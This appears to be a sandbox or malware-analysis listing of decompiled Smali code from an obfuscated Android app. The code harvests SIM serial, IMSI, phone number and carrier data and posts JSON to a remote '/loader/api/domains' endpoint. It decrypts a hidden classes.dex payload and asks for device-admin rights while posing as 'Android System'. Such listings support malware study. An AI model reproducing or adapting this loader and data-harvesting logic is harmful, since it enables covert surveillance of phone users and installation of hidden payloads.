78iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
79if-eqz v0, :cond_75
81iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
83invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
84move-result v0
85if-eqz v0, :cond_83
86cond_75:
87iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
89iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
91const-string v1, "simSerial"
93const-string v2, ""
95invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
96move-result-object v0
97iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
98goto_83:
99invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getSimCountryIso()Ljava/lang/String;
100move-result-object v0
101iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->hZyMGHgz:Ljava/lang/String;
102goto_89:
103invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getSimOperator()Ljava/lang/String;
104move-result-object v0
105iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->xnLvoQ:Ljava/lang/String;
106goto_8f:
107invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getNetworkOperatorName()Ljava/lang/String;
108move-result-object v0
109iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->jVOak:Ljava/lang/String;
110try_start_95:
111invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;
112move-result-object v0
113iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->phHwgb:Ljava/lang/String;
114try_start_9b:
115invoke-virtual {p2}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
116move-result-object v0
117iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
119iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
120if-eqz v0, :cond_c0
122iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
124invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
125move-result v0
126if-nez v0, :cond_c0
128iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
130iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
132iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
134invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
135move-result-object v0
137const-string v2, "imsi"
139invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
140move-result-object v0
142invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
143cond_c0:
144iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
145if-eqz v0, :cond_cc
147iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
149invoke-virtual {v0}, Ljava/lang/String;->isEmpty()Z
150move-result v0
151if-eqz v0, :cond_da
152cond_cc:
153iget-object v0, p1, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
155iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;->DiXsQ:Landroid/content/SharedPreferences;
157const-string v1, "imsi"
159const-string v2, ""
161invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
162move-result-object v0
163iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
164goto_da: return-void
165catch_db: move-exception v0
167invoke-static {v0}, Lmpcom/crashlytics/android/Crashlytics;->logException(Ljava/lang/Throwable;)V
168goto/16 :goto_da
169catch_e0: move-exception v0
170goto/16 :goto_9b
171catch_e2: move-exception v0
172goto/16 :goto_95
173catch_e4: move-exception v0
174goto/16 :goto_8f
175catch_e6: move-exception v0
176goto/16 :goto_89
177catch_e8: move-exception v0
178goto/16 :goto_83
179catch_ea: move-exception v0
180goto/16 :goto_44
181catch_ed: move-exception v0
182goto/16 :goto_3e
183catch_f0: move-exception v0
184goto/16 :goto_38
185catch_f3: move-exception v0
186goto/16 :goto_32
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.net.URL.<init>
  • java.net.URL.openConnection
  • javax.net.ssl.HttpsURLConnection.setRequestMethod
  • javax.net.ssl.HttpsURLConnection.setDoOutput
  • javax.net.ssl.HttpsURLConnection.setConnectTimeout
  • javax.net.ssl.HttpsURLConnection.setReadTimeout
  • org.json.JSONObject.toString
  • java.lang.String.getBytes
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.lang.StringBuilder.<init>
  • javax.net.ssl.HttpsURLConnection.getResponseCode
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.io.IOException.<init>
  • java.lang.Exception.printStackTrace
  • java.io.ByteArrayOutputStream.toString
  • org.json.JSONObject.<init>
Strings
  • /loader/api/domains?isApk=true
  • POST
  • invalid status code:
Position Instruction Meta Information
0try_start_0: new-instance v0, Ljava/net/URL;
1new-instance v1, Ljava/lang/StringBuilder;
3invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
5iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/wymvtEV;->DiXsQ:Ljava/lang/String;
7invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
8move-result-object v1
10const-string v2, "/loader/api/domains?isApk=true"
12invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
13move-result-object v1
15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
16move-result-object v1
18invoke-direct {v0, v1}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
20invoke-virtual {v0}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
21move-result-object v0
22check-cast v0, Ljavax/net/ssl/HttpsURLConnection;
24const-string v1, "POST"
26invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setRequestMethod(Ljava/lang/String;)V
27const/4 v1, 0x1
29invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setDoOutput(Z)V
30const/16 v1, 0x7530
32invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setConnectTimeout(I)V
33const/16 v1, 0x7530
35invoke-virtual {v0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setReadTimeout(I)V
37invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;)V
39iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/wymvtEV;->Odjrct:Lorg/json/JSONObject;
41invoke-virtual {v1}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
42move-result-object v1
44invoke-virtual {v1}, Ljava/lang/String;->getBytes()[B
45move-result-object v1
47invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->DiXsQ(Ljava/net/URLConnection;[B)V
49invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
50move-result v1
51const/16 v2, 0xc8
52if-eq v1, v2, :cond_6f
53new-instance v1, Ljava/io/IOException;
54new-instance v2, Ljava/lang/StringBuilder;
56const-string v3, "invalid status code: "
58invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
60invoke-virtual {v0}, Ljavax/net/ssl/HttpsURLConnection;->getResponseCode()I
61move-result v0
63invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
64move-result-object v0
66invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
67move-result-object v0
69invoke-direct {v1, v0}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
70throw v1
71try_end_64: move-exception v0
72move-object v1, v0
74invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
75new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
77invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Exception;)V
78goto_6e: return-object v0
79try_start_6f:
80invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->Odjrct(Ljava/net/URLConnection;)Ljava/io/ByteArrayOutputStream;
81move-result-object v0
82new-instance v1, Lorg/json/JSONObject;
84invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->toString()Ljava/lang/String;
85move-result-object v0
87invoke-direct {v1, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
88new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;
90invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/peOiD;
91move-result-object v1
93invoke-direct {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/NQaBq;-><init>(Ljava/lang/Object;)V
94try_end_85: goto/16 :goto_6e
Cross References
APIs
  • java.io.FileInputStream.<init>
  • java.io.ByteArrayOutputStream.<init>
  • java.io.ByteArrayOutputStream.toByteArray
  • java.lang.Exception.<init>
  • javax.crypto.Cipher.getInstance
  • javax.crypto.spec.IvParameterSpec.<init>
  • javax.crypto.Cipher.init
  • javax.crypto.Cipher.doFinal
  • java.io.File.<init>
  • java.io.FileOutputStream.<init>
  • java.io.BufferedOutputStream.<init>
  • java.util.zip.ZipOutputStream.<init>
  • java.util.zip.ZipEntry.<init>
  • java.util.zip.ZipOutputStream.putNextEntry
  • java.util.zip.ZipOutputStream.write
  • java.util.zip.ZipOutputStream.close
  • java.io.FileOutputStream.close
  • java.io.FileOutputStream.write
  • java.io.FileOutputStream.close
Strings
  • data too short
  • classes.dex
Position Instruction Meta Information
0const/16 v6, 0x10
1new-instance v0, Ljava/io/FileInputStream;
3invoke-direct {v0, p0}, Ljava/io/FileInputStream;-><init>(Ljava/io/File;)V
4new-instance v1, Ljava/io/ByteArrayOutputStream;
6invoke-direct {v1}, Ljava/io/ByteArrayOutputStream;-><init>()V
8invoke-static {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ(Ljava/io/InputStream;Ljava/io/OutputStream;)J
10iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;
12invoke-virtual {v1}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
13move-result-object v1
14array-length v2, v1
15if-ge v2, v6, :cond_20
16new-instance v0, Ljava/lang/Exception;
18const-string v1, "data too short"
20invoke-direct {v0, v1}, Ljava/lang/Exception;-><init>(Ljava/lang/String;)V
21throw v0
22cond_20: const/4 v2, 0x0
24invoke-static {v1, v2, v6}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ([BII)[B
25move-result-object v2
27sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->DiXsQ:Ljava/lang/String;
29invoke-static {v3}, Ljavax/crypto/Cipher;->getInstance(Ljava/lang/String;)Ljavax/crypto/Cipher;
30move-result-object v3
31const/4 v4, 0x2
33iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;->Odjrct:Ljava/security/Key;
34new-instance v5, Ljavax/crypto/spec/IvParameterSpec;
36invoke-direct {v5, v2}, Ljavax/crypto/spec/IvParameterSpec;-><init>([B)V
38invoke-virtual {v3, v4, v0, v5}, Ljavax/crypto/Cipher;->init(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V
39array-length v0, v1
40add-int/lit8 v0, v0, -0x10
42invoke-static {v1, v6, v0}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ([BII)[B
43move-result-object v0
45invoke-virtual {v3, v0}, Ljavax/crypto/Cipher;->doFinal([B)[B
46move-result-object v0
47new-instance v1, Ljava/io/File;
49invoke-direct {v1, p1, p2}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
50new-instance v2, Ljava/io/FileOutputStream;
52invoke-direct {v2, v1}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
53sget v3, Landroid/os/Build$VERSION;->SDK_INT:I
54const/16 v4, 0xe
55if-ge v3, v4, :cond_74
56try_start_51: new-instance v3, Ljava/util/zip/ZipOutputStream;
57new-instance v4, Ljava/io/BufferedOutputStream;
59invoke-direct {v4, v2}, Ljava/io/BufferedOutputStream;-><init>(Ljava/io/OutputStream;)V
61invoke-direct {v3, v4}, Ljava/util/zip/ZipOutputStream;-><init>(Ljava/io/OutputStream;)V
62new-instance v4, Ljava/util/zip/ZipEntry;
64const-string v5, "classes.dex"
66invoke-direct {v4, v5}, Ljava/util/zip/ZipEntry;-><init>(Ljava/lang/String;)V
68invoke-virtual {v3, v4}, Ljava/util/zip/ZipOutputStream;->putNextEntry(Ljava/util/zip/ZipEntry;)V
70invoke-virtual {v3, v0}, Ljava/util/zip/ZipOutputStream;->write([B)V
72invoke-virtual {v3}, Ljava/util/zip/ZipOutputStream;->close()V
73try_end_6b:
74invoke-virtual {v2}, Ljava/io/FileOutputStream;->close()V
75goto_6e: return-object v1
76catchall_6f: move-exception v0
78invoke-virtual {v2}, Ljava/io/FileOutputStream;->close()V
79throw v0
80cond_74:
81invoke-virtual {v2, v0}, Ljava/io/FileOutputStream;->write([B)V
82try_end_77:
83invoke-virtual {v2}, Ljava/io/FileOutputStream;->close()V
84goto/16 :goto_6e
85catchall_7b: move-exception v0
87invoke-virtual {v2}, Ljava/io/FileOutputStream;->close()V
88throw v0
Cross References
APIs
  • java.lang.String.valueOf
  • java.lang.System.currentTimeMillis
  • java.util.Calendar.getInstance
  • java.util.Calendar.getTime
  • java.text.SimpleDateFormat.format
  • java.lang.String.replaceAll
  • android.content.Context.getSystemService
  • android.app.admin.DevicePolicyManager.getActiveAdmins
  • java.util.List.isEmpty
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • android.content.ComponentName.getPackageName
  • android.content.Context.getPackageName
  • java.lang.String.equals
  • android.content.Context.getSharedPreferences
  • android.content.SharedPreferences.getString
Strings
  • (\\d\\d)(\\d\\d)$
  • $1:$2
  • device_policy
  • loader
  • referrer
Position Instruction Meta Information
0const/4 v1, 0x0
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
4iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
6invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->hZyMGHgz()Ljava/lang/String;
7move-result-object v2
8iput-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->lVfyLT:Ljava/lang/String;
10iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
12iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
14invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->xnLvoQ()I
15move-result v2
17invoke-static {v2}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
18move-result-object v2
19iput-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xfPEz:Ljava/lang/String;
21iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
23invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
24move-result-wide v2
25const-wide/16 v4, 0x3e8
26div-long/2addr v2, v4
27long-to-int v2, v2
28int-to-long v2, v2
29iput-wide v2, v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->FySkt:J
31iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
33iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak:Landroid/content/Context;
35invoke-static {v2}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak(Landroid/content/Context;)I
36move-result v2
37iput v2, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->CyGFDR:I
39iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
41invoke-static {}, Ljava/util/Calendar;->getInstance()Ljava/util/Calendar;
42move-result-object v2
44invoke-virtual {v2}, Ljava/util/Calendar;->getTime()Ljava/util/Date;
45move-result-object v2
47sget-object v3, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->xnLvoQ:Ljava/text/SimpleDateFormat;
49invoke-virtual {v3, v2}, Ljava/text/SimpleDateFormat;->format(Ljava/util/Date;)Ljava/lang/String;
50move-result-object v2
52const-string v3, "(\\d\\d)(\\d\\d)$"
54const-string v4, "$1:$2"
56invoke-virtual {v2, v3, v4}, Ljava/lang/String;->replaceAll(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
57move-result-object v2
58iput-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DoHnmwOG:Ljava/lang/String;
60iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
61iget-boolean v0, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xfPEz:Z
62if-nez v0, :cond_89
64iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
66iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak:Landroid/content/Context;
68const-string v0, "device_policy"
70invoke-virtual {v3, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
71move-result-object v0
72check-cast v0, Landroid/app/admin/DevicePolicyManager;
74invoke-virtual {v0}, Landroid/app/admin/DevicePolicyManager;->getActiveAdmins()Ljava/util/List;
75move-result-object v0
76if-eqz v0, :cond_9e
78invoke-interface {v0}, Ljava/util/List;->isEmpty()Z
79move-result v4
80if-nez v4, :cond_9e
82invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
83move-result-object v4
84cond_6c:
85invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
86move-result v0
87if-eqz v0, :cond_9e
89invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
90move-result-object v0
91check-cast v0, Landroid/content/ComponentName;
93invoke-virtual {v0}, Landroid/content/ComponentName;->getPackageName()Ljava/lang/String;
94move-result-object v0
96invoke-virtual {v3}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
97move-result-object v5
99invoke-virtual {v0, v5}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
100move-result v0
101if-eqz v0, :cond_6c
102const/4 v0, 0x1
103goto_87: iput-boolean v0, v2, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->xfPEz:Z
104cond_89:
105iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
107iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak:Landroid/content/Context;
109const-string v3, "loader"
111invoke-virtual {v2, v3, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
112move-result-object v1
114const-string v2, "referrer"
116const-string v3, ""
118invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
119move-result-object v1
120iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->ciatqPxI:Ljava/lang/String;
121return-object p0
122cond_9e: move v0, v1
123goto/16 :goto_87
APIs
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.DiXsQ
  • java.util.HashMap.<init>
  • java.util.concurrent.ConcurrentHashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getValue
  • java.lang.String.lastIndexOf
  • java.lang.String.substring
  • java.util.Map$Entry.getKey
  • java.util.HashMap.put
  • java.lang.Exception.getStackTrace
  • java.util.HashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.StackTraceElement.getClassName
  • java.util.Map$Entry.getValue
  • java.lang.String.startsWith
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.DiXsQ
  • java.util.Map$Entry.getKey
  • java.lang.Integer.intValue
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.stopSelf
  • android.os.Process.myPid
  • android.os.Process.killProcess
Position Instruction Meta Information
0const/4 v2, 0x0
2invoke-static {p1}, Lmpcom/crashlytics/android/Crashlytics;->logException(Ljava/lang/Throwable;)V
4iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/IVPcyiFs;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
6invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;)Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
7move-result-object v0
8new-instance v3, Ljava/util/HashMap;
10invoke-direct {v3}, Ljava/util/HashMap;-><init>()V
12iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
14invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->entrySet()Ljava/util/Set;
15move-result-object v0
17invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
18move-result-object v4
19goto_19:
20invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
21move-result v0
22if-eqz v0, :cond_41
24invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
25move-result-object v0
26check-cast v0, Ljava/util/Map$Entry;
28invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
29move-result-object v1
30check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/Module;
32iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
34iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->LmcGi:Ljava/lang/String;
35const/16 v5, 0x2e
37invoke-virtual {v1, v5}, Ljava/lang/String;->lastIndexOf(I)I
38move-result v5
40invoke-virtual {v1, v2, v5}, Ljava/lang/String;->substring(II)Ljava/lang/String;
41move-result-object v1
43invoke-interface {v0}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
44move-result-object v0
46invoke-virtual {v3, v0, v1}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
47goto/16 :goto_19
48cond_41:
49invoke-virtual {p1}, Ljava/lang/Exception;->getStackTrace()[Ljava/lang/StackTraceElement;
50move-result-object v4
51array-length v5, v4
52goto_46: if-ge v2, v5, :cond_86
53aget-object v6, v4, v2
55invoke-virtual {v3}, Ljava/util/HashMap;->entrySet()Ljava/util/Set;
56move-result-object v0
58invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
59move-result-object v7
60goto_52:
61invoke-interface {v7}, Ljava/util/Iterator;->hasNext()Z
62move-result v0
63if-eqz v0, :cond_82
65invoke-interface {v7}, Ljava/util/Iterator;->next()Ljava/lang/Object;
66move-result-object v0
67check-cast v0, Ljava/util/Map$Entry;
69invoke-virtual {v6}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
70move-result-object v8
72invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
73move-result-object v1
74check-cast v1, Ljava/lang/String;
76invoke-virtual {v8, v1}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
77move-result v1
78if-eqz v1, :cond_52
80iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/IVPcyiFs;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
82invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;)Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
83move-result-object v1
85invoke-interface {v0}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
86move-result-object v0
87check-cast v0, Ljava/lang/Integer;
89invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
90move-result v0
92invoke-virtual {v1, v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(I)V
93goto/16 :goto_52
94cond_82: add-int/lit8 v0, v2, 0x1
95move v2, v0
96goto/16 :goto_46
97cond_86:
98iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/IVPcyiFs;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;
100invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/KezZERjCGv7fpQLHuQ;->stopSelf()V
102invoke-static {}, Landroid/os/Process;->myPid()I
103move-result v0
105invoke-static {v0}, Landroid/os/Process;->killProcess(I)V
106return-void
APIs
  • android.app.Activity.getSystemService
  • android.content.ComponentName.<init>
  • android.content.Context.getPackageManager
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.content.pm.PackageManager.queryIntentActivities
  • java.util.List.get
  • android.content.ComponentName.<init>
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.content.Intent.addFlags
  • android.app.Activity.startActivityForResult
  • android.os.Looper.getMainLooper
  • android.os.Handler.<init>
  • android.os.Handler.post
Strings
  • activity
  • android.app.action.ADD_DEVICE_ADMIN
  • android.app.extra.DEVICE_ADMIN
  • android.app.extra.ADD_EXPLANATION
  • Android System
Position Instruction Meta Information
1const-string v0, "activity"
3invoke-virtual {p1, v0}, Landroid/app/Activity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
4move-result-object v0
5check-cast v0, Landroid/app/ActivityManager;
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->DiXsQ:Landroid/app/ActivityManager;
7new-instance v0, Landroid/content/ComponentName;
8const-class v1, Lcom/czybg/eqtbdmzpklrgyns/BYdZZAIwCWFdZwW;
10invoke-direct {v0, p1, v1}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
12invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
13move-result-object v1
14new-instance v2, Landroid/content/Intent;
16const-string v3, "android.app.action.ADD_DEVICE_ADMIN"
18invoke-direct {v2, v3}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
20const-string v3, "android.app.extra.DEVICE_ADMIN"
22invoke-virtual {v2, v3, v0}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
23const/high16 v0, 0x10000
25invoke-virtual {v1, v2, v0}, Landroid/content/pm/PackageManager;->queryIntentActivities(Landroid/content/Intent;I)Ljava/util/List;
26move-result-object v0
27const/4 v1, 0x0
29invoke-interface {v0, v1}, Ljava/util/List;->get(I)Ljava/lang/Object;
30move-result-object v0
31check-cast v0, Landroid/content/pm/ResolveInfo;
33iget-object v0, v0, Landroid/content/pm/ResolveInfo;->activityInfo:Landroid/content/pm/ActivityInfo;
35iget-object v0, v0, Landroid/content/pm/ActivityInfo;->name:Ljava/lang/String;
36iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;->Odjrct:Ljava/lang/String;
37new-instance v0, Landroid/content/ComponentName;
38const-class v1, Lcom/czybg/eqtbdmzpklrgyns/BYdZZAIwCWFdZwW;
